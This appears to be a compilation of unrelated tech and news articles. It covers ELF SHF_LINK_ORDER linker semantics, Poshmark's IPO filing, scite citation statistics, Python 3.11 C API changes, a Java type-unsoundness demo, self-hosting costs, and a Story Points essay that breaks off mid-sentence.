In the end the agreement was that SHF_LINK_ORDER gained additional metadata GC semantics. This flag adds special ordering requirements for link editors. The requirements apply to the referenced section identified by the sh_link field of this section's header. If this section is combined with other sections in the output file, the section must appear in the same relative order with respect to those sections, as the referenced section appears with respect to sections the referenced section is combined with. A typical use of this flag is to build a table that references text or data sections in address order. In addition to adding ordering requirements, SHF_LINK_ORDER indicates that the section contains metadata describing the referenced section. When performing unused section elimination, the link editor should ensure that both the section and the referenced section are retained or discarded together. Furthermore, relocations from this section into the referenced section should not be taken as evidence that the referenced section should be retained. Actually, ARM EHABI has been using SHF_LINK_ORDER for index table sections .ARM.exidx*. A .ARM.exidx section contains a sequence of 2-word pairs. The first word is 31-bit PC-relative offset to the start of the region. The idea is that if the entries are ordered by the start address, the end address of an entry is implicitly the start address of the next entry and does not need to be explicitly encoded. For this reason the section uses SHF_LINK_ORDER for the ordering requirement. The GC semantics are very similar to the metadata sections'. So the updated SHF_LINK_ORDER wording can be seen as recognition for the current practice (even though the original discussion did not actually notice ARM EHABI). In GNU as, before version 2.35, SHF_LINK_ORDER could be produced by ARM assembly directives, but not specified by user-customized sections. If an output section consists of only non-SHF_LINK_ORDER sections, the rule is clear: input sections are ordered in their input order. If an output section consists of only SHF_LINK_ORDER sections, the rule is also clear: input sections are ordered with respect to their linked-to sections. What is unclear is how to handle an output section with mixed unordered and ordered sections. Now, in a non-relocatable link, SHF_LINK_ORDER sections are ordered before non-SHF_LINK_ORDER sections in an output section (https://sourceware.org/bugzilla/show_bug.cgi?id=26256, D77007). Before, the lld diagnostic error: incompatible section flags for .rodata and GNU ld's diagnostic caused a problem if the user wanted to place such input sections along with unordered sections, e.g. .init.data : { ... KEEP(*(__patchable_function_entries)) ... } (https://github.com/ClangBuiltLinux/linux/issues/953). Mixed unordered and ordered sections within an input section description was still a problem. This made it infeasible to add SHF_LINK_ORDER to an existing metadata section and expect new object files linkable with old object files which do not have the flag. I asked how to resolve this upgrade issue and Ali Bahrami responded: The Solaris linker puts sections without SHF_LINK_ORDER at the end of the output section, in first-in-first-out order, and I don't believe that's considered to be an error. So I went ahead and implemented a similar rule for ld.lld: D84001 allows arbitrary mix and places SHF_LINK_ORDER sections before non-SHF_LINK_ORDER sections. 
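Since GNU as 2.35 and the LLVM integrated assembler accept the "o" flag on user-defined sections (as noted above), a hand-written SHF_LINK_ORDER record can also be emitted from C with a top-level asm block. This is only a sketch: x86-64 GNU as syntax is assumed, and foo is just an illustrative linked-to symbol:

void foo(void) {}

/* "o" marks the section SHF_LINK_ORDER; the trailing symbol selects the
   linked-to section, so the record is retained or discarded with foo. */
__asm__(".pushsection meta,\"ao\",@progbits,foo\n"
        ".quad foo - .\n"   /* PC-relative, avoids text relocations */
        ".popsection\n");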
We decided that the integrated assembler allows SHF_LINK_ORDER with sh_link=0 and ld.lld can handle such sections as regular unordered sections (https://reviews.llvm.org/D72904). You will see error: ... sh_link points to discarded section .... A SHF_LINK_ORDER section has an assumption: it can only be referenced by its linked-to section. Inlining and the discussed __start_ rule can break this assumption. A function section has a metadata section. No inlining. SHF_LINK_ORDER is the perfect solution. A section group can be used, but that just adds size overhead. A function needs __llvm_prf_cnts, __llvm_prf_data and in some cases __llvm_prf_vals. Inlining may happen. A function references its __llvm_prf_cnts and may reference its __llvm_prf_data if value profiling applies. The __llvm_prf_data references the text section, the associated __llvm_prf_cnts and the associated __llvm_prf_vals. Because the __llvm_prf_cnts and the __llvm_prf_data may be referenced by more than one text section, SHF_LINK_ORDER is not a solution. We need to place the __llvm_prf_cnts, the __llvm_prf_data and (if present) the __llvm_prf_vals in one section group so that they will be retained or discarded as a unit. If the text section is already in a COMDAT group, we can reuse the group; otherwise we need to create a zero flag section group and optionally place the text section into the group. LLVM from 13.0.0 onwards will use a zero flag section group. Note: due to the __start_ reference rule and the fact that the __llvm_prf_data references the text section, with GNU ld and gold all instrumented text sections cannot be discarded. There can be a huge size bloat. If you use GNU ld>=2.37, you can try -z start-stop-gc. For Windows, the cnts section is named .lprfc$M and the data section is named .lprfd$M. The garbage collection story is unfortunate. If an IMAGE_COMDAT_SELECT_ASSOCIATIVE section defines an external symbol, MSVC link.exe may report a spurious duplicate symbol error (error LNK2005), even if the associative section would be discarded after handling the leader symbol. lld-link doesn't have this limitation. However, a portable implementation needs to work around MSVC link.exe. For a COMDAT .lprfd$M, its symbol must be external (linkonce_odr), otherwise references to a non-prevailing symbol would cause an error. Due to the limitation, .lprfd$M has to reside in its own COMDAT, no sharing with .lprfc$M. Different COMDAT groups mean that the liveness of one .lprfc$M does not make its associative .lprfd$M live. Since a .lprfd$M may be unreferenced, we have to conservatively assume all COMDAT .lprfd$M live. Since .lprfc$M input sections parallel .lprfd$M input sections, we have to conservatively assume all COMDAT .lprfc$M live. For an external symbol, we use a /INCLUDE: directive in .drectve to mark it as a GC root. As a result, .drectve may have many /INCLUDE: directives, just to work around the link.exe limitation. Note: for ELF we can use R_*_NONE to establish an artificial dependency edge between two sections. I don't think PE-COFF provides a similar feature. clang -fexperimental-sanitize-metadata=atomics instruments functions and creates !pcsections metadata for functions and atomic instructions. The address of an instrumented atomic instruction is recorded in a section named sanmd_atomics. The sanmd_atomics section has the SHF_LINK_ORDER flag and links to the text section. Arm Compiler 5 splits up DWARF Version 3 debug information and puts these sections into comdat groups. 
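Returning briefly to the PE-COFF /INCLUDE: workaround mentioned above before the DWARF discussion continues: such a directive can be requested from C source with MSVC's (and clang-cl's) linker pragma. The symbol name below is purely illustrative:

/* Define some external symbol and force link.exe/lld-link to treat it as a
   GC root via a .drectve /INCLUDE: directive. (On 32-bit x86 the mangled
   name would need a leading underscore.) */
int my_meta_anchor = 1;
#pragma comment(linker, "/include:my_meta_anchor")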
On "monolithic input section handling", Peter Smith commented that: "We found that splitting up the debug into fragments works well as it permits the linker to ensure that all the references to local symbols are to sections within the same group, this makes it easy for the linker to remove all the debug when the group isn't selected. This approach did produce significantly more debug information than gcc did. For small microcontroller projects this wasn't a problem. For larger feature phone problems we had to put a lot of work into keeping the linker's memory usage down as many of our customers at the time were using 32-bit Windows machines with a default maximum virtual memory of 2Gb." COMDAT sections have size overhead on extra section headers. Developers may be tempted to decrease the overhead with SHF_LINK_ORDER. However, the approach does not work due to the ordering requirement. Consider the following fragments:

- DW_TAG_compile_unit [a.o common]
-- DW_TAG_variable [a.o .data.foo]
-- DW_TAG_namespace [common]
--- DW_TAG_subprogram [a.o .text.bar]
--- DW_TAG_variable [a.o .data.baz]
- DW_TAG_compile_unit [b.o common]
-- DW_TAG_variable [b.o .data.foo]
-- DW_TAG_namespace [common]
--- DW_TAG_subprogram [b.o .text.bar]
--- DW_TAG_variable [b.o .data.baz]

DW_TAG_* tags associated with concrete sections can be represented with SHF_LINK_ORDER sections. After linking, the sections will be ordered before the common parts. On Mach-O, ld64 defines section$start$__DATA$__data and section$end$__DATA$__data, which are similar to __start_/__stop_. ld64's behavior is similar to ld.lld -z start-stop-gc.
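To round this off with the Mach-O analogue just mentioned: because $ cannot appear in a C identifier, the ld64-synthesized bounds symbols are usually reached through asm labels. A minimal sketch, using the __DATA,__data pair named above:

#include <stdio.h>

/* ld64 synthesizes these when the (segment, section) pair exists. */
extern char data_start __asm__("section$start$__DATA$__data");
extern char data_end   __asm__("section$end$__DATA$__data");

static void report_data_bounds(void) {
  printf("__DATA,__data occupies %zu bytes\n",
         (size_t)(&data_end - &data_start));
}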
1
Poshmark files S-1 to go public
Poshmark is an online marketplace for secondhand clothing, shoes and accessories. The company filed to go public on Thursday. Poshmark has reported a profit in the past two quarters after consistently turning net losses. Online clothing reseller Poshmark filed its IPO prospectus on Thursday, after racking up over $30 million in profit over the past two quarters. Poshmark, founded in 2011, is an internet marketplace for second-hand clothing, shoes and accessories. Like eBay, Poshmark connects buyers with sellers, who often list items from their own closet. The company makes money by taking a cut of each transaction. Poshmark's filing is landing in investors' laps after last week's IPOs of DoorDash and Airbnb, which are also marketplace businesses, resulted in huge first-day pops, potentially indicating public market appetite for the business model. Discount online retailer Wish followed with its IPO this week, though its stock price fell out of the gate. Revenue at Poshmark increased 28% in the first three quarters of 2020 to $192.8 million from $150.5 million the same period last year. It swung to a profit of $20.9 million over that stretch, after losing $33.9 million a year ago. Gross merchandise volume, a key metric measuring total dollar value of merchandise sold online, was negatively impacted in the first quarter because of the coronavirus pandemic. It increased just 9% in the first three months of the year, but rebounded to 42% growth in the second quarter as buyer and seller activity resumed. The company also cited its growing base of active buyers, which doubled in June from two years ago. Like many online retailers, Poshmark said it's benefited from a flood of demand generated by the coronavirus, as local governments ordered people to stay indoors and retail stores closed. The marketplace has also served as a source of additional income for Poshmark's 4.5 million sellers, the company added. However, Poshmark said that Covid-19 remains a risk because of the economic impact on consumers and uncertainty about the stability of the broader economy. "Responses to the COVID-19 pandemic such as prolonged work-from-home policies, quarantines, closures, and travel restrictions could continue to depress demand for the products sold on our platform," the company said in the prospectus. The filing provides the first look into Poshmark's financials after the company confidentially filed to go public in September. It plans to list on the Nasdaq under the symbol "POSH." Poshmark said it now counts 6.2 million active buyers and 31.7 million active users, the majority of which are female and are either millennials or Gen Z. It lists Amazon, eBay, Etsy, Facebook, Shopify, TJ Maxx and Walmart among its competitors. Morgan Stanley and Goldman Sachs are leading the offering.
1
Why social media regulation is cursed by Net Neutrality
Opinion: To Regulate Social Media, Forget Net Neutrality. Photo: Illustration by Jeremie Claeys. The conservative Federalist Society's virtual national convention recently hosted a panel on "Regulating Social Media" featuring a prominent cast of government officials and outside experts. I tuned in, expecting a robust discussion on privacy, data portability, algorithmic bias and content moderation. It was a disappointment. They spent most of the time relitigating the merger between Sprint and T-Mobile and the net neutrality debate around broadband internet service providers.
1
Characteristics of Scite Citation Statements
Tue Jan 25 2022. This post describes some simple summary statistics on the length of scite citation statements and an overview of what we mean when we say citation statements. Notable findings are that the average citation length is 472 characters but with quite a high variance (191 characters at the first standard deviation); supporting and contrasting citation statements tend to have a bit less variance (with 176 and 168 characters respectively for their first standard deviation) suggesting they are a bit more formulaic; and citations in the introduction sections tend to be longer (500 characters) and citations in the methods section tend to be shorter (420 characters) which is an intuitive finding of what we would expect in those sections. In order to help you picture what 472 characters looks like see Figure 1 and keep in mind that a maximum tweet length is 280 characters. Much of what scite is built on is what we call citation statements. These have been called citances, in-text citations, citation contexts, and other things by scholars of scientific literature and typically indicate some span of text surrounding a citation made inside of a scholarly document. For example, the sentence "This supports the results presented in Gorman et al. (2020)." is what is typically indicated by those terms. Extracting these citation statements allows us to classify them to present text spans that users can read in order to understand what is being said about cited papers. However, simply presenting one sentence that captures the citation isn't enough. This is clear from the example presented above. Which results are "the results in Gorman"? What is "this" in "this supports"? And more questions. Because single sentence citation statements are not clear enough on their own we typically capture the sentence before and after the sentence in which the citation appears in order to give users a fuller understanding of why the work is being cited and a better reading experience. For more information on how we do this see our manuscript Nicholson et al. (2021) outlining our methods. Given those citation statements, some have been interested in how long they are. Are they long enough to give enough context about an author's motivation behind citing? How do they differ across citation types (are supporting citations longer than contrasting ones?) or citation section (are introduction citation statements longer than methods citation statements?). In the below analysis we will look at these questions to help you get a better understanding of scite Citation Statements. If you are interested in the characteristics of in-text citations in general, Boyack et al. (2017) is a good resource to look at. At the time of writing (January 25th 2022), scite has over 968m citation statements which have been extracted from over 28m full-text articles. In order to look at the characteristics of those citation statements in an easy-to-characterize way, we simply count the number of characters in each citation statement. Over a corpus of almost 1bn citation statements this is much easier than tokenizing the statements and counting by number of words. See Figure 1 below for what a typical citation statement looks like.
After counting each citation statement's characters, we look at the average, standard deviation, minimum, maximum, and number of citations for the following groups of citations: all citations, citations by type (supporting, mentioning, contrasting), and citations by section (introduction, methods, results, discussion). See Table 1 below for a presentation of those summary statistics. The incidence of hypotension in the ropivacaine only group in our study (53.3%) was higher than that reported by McNamee et al 17 with a similar dose of isobaric ropivacaine 0.75% (18.75 mg). This may be because the volume of drug that was administered in our study was 3.0 ml compared to 2.5 ml in the study by McNamee et al. However, the addition of dexemdetomidine did not alter the hemodynamic profile of ropivacaine. Figure 1: Typical citation statement (472 characters, a contrasting citation from a discussion section) Table 1: Summary statistics of character counts of citation statements by various groups. For context, the maximum tweet length is 280 characters. Given Table 1 above, it is interesting to note a few things. First, the average citation length across groups is 472 characters as in Figure 1. In Figure 1, a contrasting citation from the discussion section, you can see three sentences with the first presenting the difference of results [incidence of hypotension in the ropivacaine only group… higher than… McNamee et al], the second qualifying the difference in method [3.0 ml compared to 2.5 ml in the study by McNamee et al] and the third sentence further justifying conclusions. The typical 472 character length citation statement then seems to provide evidence that the citation statements that we show in scite provide a clearer and more contextualized reading experience than simply the sentence in which the citation is made (In Figure 1, the citing sentence is only 197 characters). However, in Table 1, we also see that the variance in character lengths is naturally quite high. The first standard deviation is 191 characters, meaning that 68% of citation statements could be 472 +/- 191 characters. This seems intuitive because the natural variation in sentence lengths is quite high. We should qualify this variance though, since citing sentences that are at the beginning of a paragraph will naturally not have a preceding sentence and citing sentences at the end will not have a following one; part of the variance will simply be capturing the uninformative difference between where the target sentences occur in a paragraph. It is also interesting to look at how citation lengths differ by group. Some groups are not notably different in average length but are slightly less variant. In citation type we see that contrasting citations only have 168 characters at the first standard deviation and supporting citations have only 176 characters at the first standard deviation. While this is a small difference when compared to the variance of 191 characters, this might indicate that supporting and contrasting citations tend to be a bit more formulaic in how they are written. Within citations by section we actually see something quite intuitive. Citations in the introduction section tend to be longer, at 500 average characters per citation, and method citations tend to be shorter, at 420 average characters per citation.
This is intuitive, because we would expect introduction sections to have longer discussions of background work and methods citations to be concise descriptions of method, with elaboration and longer discussion saved for later sections. This analysis has been just an initial peek into what scite citation statements tend to look like in aggregate. Further work could use scite citation statements as a vehicle for studying the language of citations, including lexical diversity (how diverse is the vocabulary used in citation statements and how that might differ from the vocabulary of papers in general), disciplinary differences across subjects and fields, the degree of unresolved and ambiguous pronouns and references in citation statements, and general differences between the language used in citation statements and other language sets such as the paper as a whole. If you are interested in doing research on citation statements themselves, please let us know at hi@scite.ai, as we would love to help you use the scite citation statement corpus for your studies. Boyack, K. W., van Eck, N. J., Colavizza, G., & Waltman, L. (2018). Characterizing in-text citations in scientific articles: A large-scale analysis. Journal of Informetrics, 12(1), 59-73. Nicholson, J. M., Mordaunt, M., Lopez, P., Uppala, A., Rosati, D., Rodrigues, N. P., Grabitz, P., & Rife, S. C. (2021). scite: A smart citation index that displays the context of citations and classifies their intent using deep learning. Quantitative Science Studies, 2(3), 882-898. https://doi.org/10.1162/qss_a_00146
1
Digitalogy: Hire pre-screened and vetted developers, risk free
A COMPREHENSIVE SOLUTION: Imagine 10,000+ developers lining up to work with you. We’ll match you with the most compatible hire and will handle all the managerial logistics.
VETTING: All of our freelancers come to you pre-screened and ready to work. With a screening process that only accepts the top 5% of applicants, you really are getting the cream of the crop.
DEDICATED MANAGER: Digitalogy will provide a manager to oversee your developer selection process and facilitate the hiring process. We’ll provide you with the developer whose skills best fit the needs of your company and product.
REMOTE: Developers will complete their work remotely and submit their finished work at designated timelines. You will be in constant communication with them as the project unfolds.
QUICK TO HIRE: Our network of pros reduces the lag time you experience when searching for viable candidates on your own. We make it easy for you by eliminating all the guesswork!
TRIAL: Hire devs for a small or dummy project to see if they are a good fit for a long-term project.
MATCHING: As our network grows, Digitalogy will learn their talents and personalities, allowing us to match the right developers for your project.
1
What’s New In Python 3.11 – Python 3.11.0a0 documentation
The PyFrameObject structure members have been removed from the public C API. While the documentation notes that the PyFrameObject fields are subject to change at any time, they have been stable for a long time and were used in several popular extensions. In Python 3.11, the frame struct was reorganized to allow performance optimizations. Some fields were removed entirely, as they were details of the old implementation. The Python frame object is now created lazily. A side effect is that the f_back member must not be accessed directly, since its value is now also computed lazily. The PyFrame_GetBack() function must be called instead. Debuggers that accessed f_locals directly must call PyFrame_GetLocals() instead. They no longer need to call PyFrame_FastToLocalsWithError() or PyFrame_LocalsToFast(); in fact, they should not call those functions. The necessary updating of the frame is now managed by the virtual machine.

Code defining PyFrame_GetCode() on Python 3.8 and older:

#if PY_VERSION_HEX < 0x030900B1
static inline PyCodeObject* PyFrame_GetCode(PyFrameObject *frame)
{
    Py_INCREF(frame->f_code);
    return frame->f_code;
}
#endif

Code defining PyFrame_GetBack() on Python 3.8 and older:

#if PY_VERSION_HEX < 0x030900B1
static inline PyFrameObject* PyFrame_GetBack(PyFrameObject *frame)
{
    Py_XINCREF(frame->f_back);
    return frame->f_back;
}
#endif

Or use the pythoncapi_compat project to get these two functions on older Python versions.
15
The Unsound Playground (2016)
OOPSLA '16 Distinguished Artifact Award. We, Nada Amin and Ross Tate, broke the Java and Scala type systems! Try it out for yourself by running the examples, which throw cast exceptions even though they contain no casts. Read our paper to learn how these examples work. Come up with your own examples and use the save icon to update the URL to a permalink to your code. Which language would you like to break? Java / Scala

class Unsound {
    static class Constrain<A, B extends A> {}
    static class Bind<A> {
        <B extends A> A upcast(Constrain<A, B> constrain, B b) { return b; }
    }
    static <T, U> U coerce(T t) {
        Constrain<U, ? super T> constrain = null;
        Bind<U> bind = new Bind<U>();
        return bind.upcast(constrain, t);
    }
    public static void main(String[] args) {
        String zero = Unsound.coerce(0);
    }
}

#!/bin/bash
set -e -v
### PICK VERSION
export JAVA_HOME=/usr/lib/jvm/java-8-openjdk-amd64
export PATH=$JAVA_HOME/bin:$PATH
### CHECK VERSION
java -version
### COMPILE
cat $1 > Unsound.java
javac Unsound.java
### RUN
java Unsound
4
A Modern Terminal Emulator
contour-terminal/contour
382
Self-Hosting Still Pays
Years ago, we had a big decision to make. In 2013, STH had grown to a size that would seem immeasurably small compared to the traffic we do today. Still, at that point, we decided that it made fiscal sense to leave Amazon AWS for colocation. We chronicled the reasoning in Falling From the Sky Why STH is Leaving the Cloud and then the cost breakdown in Falling From the Sky Part 3 – Evaluating Amazon EC2, VPS, Dedicated and Colocation Options. Since 2013, we have been doing some irregular updates that largely correspond to planned upgrades of our infrastructure. Since we are taking a look at a few upgrades again, it is time to go through the exercise once more. If you want to hear this instead of just reading, we have a YouTube video with some commentary. Of course, we can go into a bit more detail below, but some prefer to listen rather than read, so we have that option. In 2018, we looked again at whether it was time to move back to the cloud. In our cost analysis, this is what we found using 1-year estimates: Just to give some sense of how that March 2018 estimate has gone in the 32 months since we looked at this, we ended up using: Overall, it looks like we probably over-estimated self-hosting costs again, and underestimated AWS costs with respect to how much we would spend there, even after service discounts. We wanted to answer the question of what the picture would look like for hosting STH now. A few quick words on assumptions before we get there. First off, we completely could change the way we run the site. That is a given. Frankly, running in VMs, whether in the cloud or self-hosted, is convenient. Indeed, we run containers in VMs as well. We could also overhaul the entire software stack again, but frankly, we want to spend more time creating content than doing that work. Something we learned was that increasing complexity cost us more reliability than keeping things as simple as possible. Second, we are modeling current data transfer and a minimal set of VMs. We actually have a lot more running, including some services that we run for some of the labs. One could argue that since they are lab services they are part of bringing you STH, but they are not focused on the web hosting aspect, so we are going to remove them. Also, we have other VMs that are likely only online because we wanted to try something and had capacity. We may or may not elect to run those VMs if there were an incremental AWS cost. We could model these as on-demand or spot instances, but instead, we are just removing them entirely. Third, we completely understand spot pricing. We are modeling a basic set instead of adding extras. At some point, we need databases, nginx servers, and so forth. Fourth, we are going to add a mix of AMD EPYC and Intel Xeon instances roughly matching what we use for our hosting. We are heavily weighting the larger instances toward the EPYC instances since that helps bring down the costs and, for our workloads, there is no appreciable difference. We could go Arm, but that requires some small lift and shift work. Finally, we do use some AWS services. Those services we would use regardless, so we are excluding them from the analysis. We are also not modeling services such as Mailchimp, which handles our weekly newsletter, Teespring, which handles our online merch shop, YouTube, which hosts our videos, and so forth. Here is the calculator for the absolute base setup for our hosting using 1-year reserved upfront instances: As you can see, our hosting costs are just under $4,300 per month.
Swapping to 1-year reserved partial up-front on the instances helps bring pricing down a bit albeit with a $19,512 up-front cost. When we factor in the up-front we get a $4,137.63 monthly cost along with a $49,651.56 total annual cost for the year. We are not discounting here using future values/ present values. There is a big issue with this. Typically, we tend to see our servers run for years. To model that, we tend to use 3-year reserved partial upfront. Using the 3-year reserved partial upfront on the instances gives us a much lower operating cost with a larger up-front payment. First off, the $39,020 is more than we have spent in the last three years on hosting hardware. We do not purchase machines with long warranties or high markups, so if you are buying the average Dell/ HPE/ Lenovo server and think that sounds like a single server, you are trading higher upfront costs for service contracts. Given what we have seen on hardware/ remote hands, it is not a model we are pursuing. On the operating side, we get down to $1,968.51 per month which is great. Next year, we will likely do two small changes. First, we will upgrade database nodes and instead of using Optane SSDs, we will move to Cascade Lake and Optane PMem DIMMs into the database servers and upgrade a few older nodes to AMD EPYC 7002 “Rome” systems. We are testing the Ampere Altra 80-core server right now, and we are at the point where we might consider using Arm in the hosting cluster this year. We are going to increase our hardware budget to $10,000 this year. Although we did not use most of our hardware budget in 2019 nor 2020, we expect to in 2021. Making up our monthly cost, we increased a bit for inflation. We used a $895/ mo budget in 2018. Our costs are effectively flat, but we are going to assume a bit more labor to install servers/ upgrade the hardware. We are budgeting $22,000 per year or around $1833.33 per month. This is about the same as we would need for EC2’s 3-year partial upfront reserved instance, albeit without the up-front costs. The one item that skews this substantially, is that we are not replacing every node every year. We are now in a very different place than we were when we started this journey. We have existing infrastructure that is frankly fine from a performance and node count standpoint even though we have relatively under-invested over the past 32 months. We had budgeted around $1687/ month for the last two months and spent under $1000. Still, at some point, we like to replace equipment before it fails. There is clearly a lot going into this. We now have just under 8 years since this 10U colocation spot in Las Vegas was our first setup: What is not reflected in our discussion is all of the lessons learned along the way. Also, as hardware has gotten faster, and memory prices have decreased, the cost of self-hosting has gone down significantly for our applications. We are also taking advantage of falling bandwidth prices. While AWS is absolutely the right choice for many applications, and indeed we use them, for our web hosting it is not what we want for a simple and inexpensive setup. This may not be the perfect analysis, but it is a little bit of how we now look at hosting at STH.
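As a back-of-the-envelope check on the reserved-instance arithmetic above, here is a small sketch of the amortization. The up-front figure is taken from the 1-year partial-upfront quote; the recurring monthly charge is derived from the quoted effective monthly cost, so treat both numbers as illustrative:

def effective_cost(upfront, recurring_monthly, term_months=12):
    # Spread the up-front payment evenly over the term and add it to the
    # recurring charge to get an effective monthly figure.
    monthly = recurring_monthly + upfront / term_months
    total = recurring_monthly * term_months + upfront
    return monthly, total

# 1-year partial-upfront example using the figures discussed above
# (recurring monthly charge derived as 4,137.63 - 19,512/12):
monthly, total = effective_cost(upfront=19_512.00, recurring_monthly=2_511.63)
print(f"effective monthly: ${monthly:,.2f}")   # ~$4,137.63
print(f"total for the year: ${total:,.2f}")    # ~$49,651.56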
2
Reporter's fiery interview with Taliban leader after Afghanistan devastation
1
Islands of Interactivity with Vue in Vite.js
1
An atomic bomb-proof strongbox protects the U.S. Constitution
The National Archives building in Washington, D.C. houses some of the United States’ most foundational texts, including the Constitution, the Bill of Rights, and the Declaration of Independence. These three documents are collectively known as the Charters of Freedom, and could be the most closely guarded pieces of paper on the planet. During the day these important texts are available for public viewing under bulletproof glass and constant guard. But every night (and at the press of a button, should the need arise) a special elevator pulls them underground into a custom-built armored vault. The original vault was built in 1953 by the Mosler Safe Company. The firm was the logical choice, having previously taken on notable achievements like the gold bullion vault at Fort Knox, and a bank vault in Hiroshima that survived the atomic bomb. The original, 55-ton Mosler Vault was the size of a walk-in closet and employed a 20-foot scissor jack to raise and lower the Charters of Freedom. A 1953 documentary shows the lift in operation. The Mosler Vault was replaced in the early 2000s as the National Archives underwent a major $110 million renovation. The current vault was designed by Diebold. Know Before You Go: The National Archives building is open to the public 10 a.m. to 5:30 p.m.
1
Story Points
In Scrum, the idea of a sprint is well named: as a team, you are trying to complete work on a whole bunch of work items (stories) before a deadline. In a previous article in this series, Fixing Scrum, we argued against the idea of fixed time-boxes generally, because they introduce more problems than they solve: as we’ve seen in multiple articles, estimating is hard, and trying to use it as a solution to anything is misguided. So you should only estimate when you absolutely need to. Nevertheless, knowing how long things will take is really the whole purpose of this track on Estimating, and sometimes unavoidable deadlines make it necessary. In Scrum, the Estimation process is based on the concept of story points, so that will be the focus here, although essentially this discussion is relevant to anyone estimating software development. In this article we will critique story points as an estimation tool. First, we will break it down to see how it works (the diagram above will guide us), then we’ll offer some ideas for improving it. At a basic level, to calculate the number of story points for an item of work, you need the following inputs:
A Story: you’re going to need a description of the work you’re building.
Some Developers: you’re going to need developers to bring their experience of how long things take to build, and a willingness to share their thoughts and argue about the story.
A Project: Since the story will be embedded in the context of a project, this is an important input. On some projects, work is harder to complete than on others. Things like the choice of languages or architectures have an effect, as do the systems and people the project needs to interface with.
Team Experience: Over time, the team become more experienced both working with each other and with the project itself. They learn the Risk Landscape and understand where the pitfalls lie and how to avoid them.
As shown in the above diagram, you take all of these inputs, mix them together and out pops a number of story points. How does that work? How do we get from one to the other? Scrum literature says that you should “play planning poker” in order to arrive at a number of story points. In my experience, you end up with conversations like this: “Rob, you’ve played an 8. Everyone else played a 3. What’s your thinking there?” “OK, well, first, I can see that we need to mock-up a web page. Now, it’s clearly not that complex a job, but, we’ll need to run it by the sales team, and they’re notoriously hard to schedule meetings with… and we’ll need a few of them in the meeting. So, if we assume that there’s going to be two or maybe three iterations of this, it’ll soon add up into days gone by.” “I’m thinking a 2 for this task.” “I’m thinking a 5: we’re actually going to have to implement some new indexes on the database, so it’s an optimisation issue. And there could be some locking problems around the Users table if we are running this update alongside everything else.” What’s happening here? We are basically alerting each other to the risks and tasks we think are present on the story. That’s the value the experience of the team and the developers brings to the table. After some back-and-forth, the team agrees on a number. But what does this number represent? Let’s look at some interpretations: Ideal Person-Days: An obvious interpretation is that a story point is some number of person-days.
In most of the planning sessions I’ve been involved in, there is either an explicit or tacit base-lining of story points so that everyone has a similar conception of how much work is involved in one, e.g. “A story point is a morning”. The “ideal” part refers to the actual time you get to spend on a task, away from interruptions, lunches, all-hands meetings and so on. The reason not to use person-days directly is that developers all work at different speeds. Complexity: An alternate view is that a story point is about complexity. This means a Sprint is all about budgeting complexity, rather than effort. This makes some sense - complexity is a recurring theme in Risk-First, after all. However, given that the sprint is measured in person-days, and the scrum leader is going to produce a report showing how many story points were completed in a sprint, it’s clear that complexity really is just a weak proxy for person-days anyway. In fact, there are lots of tasks that might be low-complexity, but take a lot of time anyway, such as designing 500 icons. This will clearly take a lot of time, but be low-complexity, so you had better give it enough story points to represent the time you’ll spend on it. Relative Sizing: A third way of looking at it is that really, story points are just about relative sizing: it doesn’t matter what they refer to or how big they are, it’s all about trying to budget the right amount of work into the sprint. For example, you can either have two one-point stories, or a two-point story, and the effect on the sprint is the same. Because there is no fixed definition of the size of a story point, you do run the risk of story-point “inflation” or “deflation”. But unless you are trying to use them to plot team productivity over time, this shouldn’t really matter so much. And we’d never make the mistake of doing that, right? So while all the inputs seem good, there is a real lack of formalism about what exactly a story point is at the end of it. This makes it very hard to say exactly what goes on inside the “Calculate Story Points” function. Isn’t there some better way than this? Let’s see if we can make some suggestions. In his essay “Choose Boring Technology”, Dan McKinley describes a theoretical idea of “Innovation Tokens”: “Let’s say every company gets about three innovation tokens. You can spend these however you want, but the supply is fixed for a long while… If you choose to write your website in NodeJS, you just spent one of your innovation tokens. If you choose to use MongoDB, you just spent one of your innovation tokens. If you choose to use service discovery tech that’s existed for a year or less, you just spent one of your innovation tokens… there are many choices of technology that are boring and good, or at least good enough. MySQL is boring. Postgres is boring. PHP is boring.” - Choose Boring Technology, Dan McKinley. What he’s driving at here is of course risk: with shiny (i.e. non-boring) technology, you pick up lots of Hidden Risk. Innovation Tokens are paying for time spent dealing with Hidden Risk. Dan’s contention is that not only do you have the up-front costs of integrating the shiny technology, but you also have a long tail of extra running costs, as you have to manage the new technology through to maturity in your environment. Put this way, couldn’t story points be some kind of “Innovation Token”?
When re-framed this way, it becomes a lot clearer what the function “Calculate Story Points” is really attempting to do - it’s all about enumerating the risks of doing a certain task and making sure that we don’t bite off more than we can chew. If story points were simply person-days then “deploy ReliableDB” and “deploy ShinyDB” take about the same time. But, when considered from the point of view of risk, “deploy ShinyDB” should have a much higher story-point value. Sometimes, developers provide tolerances around their story-point estimates, “optimistically, 2 days, pessimistically, 4 days”. Usually, this subtlety gets lost in the planning process. It’s certainly not factored into the usual velocity calculations - we need something more robust. Another problem in Story Point estimation is bootstrapping. It is expected that, to start with, estimates made by inexperienced teams, or inexperienced team-members, are going to be poor. The expectation is also that over time, through domain experience, the estimates improve. This seems to happen somewhat in my experience. But nowhere near enough. A common complaint when tasks overrun is that the team were blind-sided by Hidden Risk, but in my experience this boils down to two things: Couldn’t we bootstrap the estimation process by providing an “Interference Checklist” for story points, based on the things that commonly throw spanners into the works? Below, I’ve sketched out a small section of what this might look like. The next article contains a more complete Interference Checklist that I’ve put together and you can modify for your own purposes. By starting discussions with an Interference Checklist, we can augment the “play planning poker” process by prompting people on things to think about, like “Do we know what done looks like here?”, “Is this going to affect some of our existing functionality?”, “How are we going to get it tested?”. A Checklist is a good way of asking questions in order that we can manage risk early on. It’s all about turning a Hidden Risk into one we’ve thought about. If the team runs through this list together, and then decides the task is a “five-story-pointer”, then surely that is a better, more rigorous approach than just plucking a number out of the air, as planning poker suggests. And, building up an Interference Checklist shouldn’t be a task done just during a retrospective. You should be allowed to add detail to it any time you like rather than waiting for a retrospective. If you’re struggling to implement some story on the project, is that because you were hit by a risk you already knew about? Is it on the list? If not, add it right there and then! Conversely, if the risk is on the list, were you prepared for it? Did someone correctly identify that it would come up? If not, can you work out why it got missed? In my opinion, one of the craziest, least well-justified elements of story point estimation is the insistence that they are sized to Fibonacci Sequence Numbers, (0, 1, 2, 3, 5, 8, 13, 21) which seems needlessly nerdy but also suggests an unearned confidence in our ability to precisely estimate story sizes. (How often can we really be sure it is an 8, not a 13?) The more options we have over the size of a story, the more difficult it is to be right. Also fewer possible sizes means we get more experience estimating work to fit that particular size. So here, I’ll stick with just three sizes, “Small”, “Medium” and “Large”, and 